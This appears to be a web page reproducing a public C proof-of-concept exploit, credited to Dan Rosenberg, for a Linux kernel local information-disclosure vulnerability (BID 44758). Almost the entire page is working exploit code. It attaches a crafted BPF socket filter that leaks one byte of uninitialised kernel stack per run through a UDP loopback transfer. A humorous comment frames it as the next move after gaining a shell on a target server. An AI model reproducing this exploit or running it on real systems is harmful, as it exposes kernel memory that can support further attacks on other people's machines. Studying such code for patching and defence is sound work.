扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
/* source: https://www.securityfocus.com/bid/44758/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. */ /* * You've done it.After hours of gdb and caffeine, you've finally got a shell * on your target's server.Maybe next time they will think twice about * running MyFirstCompSciProjectFTPD on a production machine.As you take * another sip of Mountain Dew and pick some of the cheetos out of your beard, * you begin to plan your next move - it's time to tackle the kernel. * * What should be your goal?Privilege escalation?That's impossible, there's * no such thing as a privilege escalation vulnerability on Linux.Denial of * service?What are you, some kind of script kiddie?No, the answer is * obvious.You must read the uninitialized bytes of the kernel stack, since * these bytes contain all the secrets of the universe and the meaning of life. * * How can you accomplish this insidious feat?You immediately discard the * notion of looking for uninitialized struct members that are copied back to * userspace, since you clearly need something far more elite.In order to * prove your superiority, your exploit must be as sophisticated as your taste * in obscure electronic music.After scanning the kernel source for good * candidates, you find your target and begin to code... * * by Dan Rosenberg * * Greets to kees, taviso, jono, spender, hawkes, and bla * */ #include <string.h> #include <stdio.h> #include <netinet/in.h> #include <sys/socket.h> #include <unistd.h> #include <stdlib.h> #include <linux/filter.h> #define PORT 37337 int transfer(int sendsock, int recvsock) { struct sockaddr_in addr; char buf[512]; int len = sizeof(addr); memset(buf, 0, sizeof(buf)); if (fork()) return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len); sleep(1); memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len); exit(0); } int main(int argc, char * argv[]) { int sendsock, recvsock, ret; unsigned int val; struct sockaddr_in addr; struct sock_fprog fprog; struct sock_filter filters[5]; if (argc != 2) { printf("[*] Usage: %s offset (0-63)\n", argv[0]); return -1; } val = atoi(argv[1]); if (val > 63) { printf("[*] Invalid byte offset (must be 0-63)\n"); return -1; } recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (recvsock < 0 || sendsock < 0) { printf("[*] Could not create sockets.\n"); return -1; } memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = htonl(INADDR_ANY); if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { printf("[*] Could not bind socket.\n"); return -1; } memset(&fprog, 0, sizeof(fprog)); memset(filters, 0, sizeof(filters)); filters[0].code = BPF_LD|BPF_MEM; filters[0].k = (val & ~0x3) / 4; filters[1].code = BPF_ALU|BPF_AND|BPF_K; filters[1].k = 0xff << ((val % 4) * 8); filters[2].code = BPF_ALU|BPF_RSH|BPF_K; filters[2].k = (val % 4) * 8; filters[3].code = BPF_ALU|BPF_ADD|BPF_K; filters[3].k = 256; filters[4].code = BPF_RET|BPF_A; fprog.len = 5; fprog.filter = filters; if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) { printf("[*] Failed to install filter.\n"); return -1; } ret = transfer(sendsock, recvsock); printf("[*] Your byte: 0x%.02x\n", ret - 248); } |
体验盒子
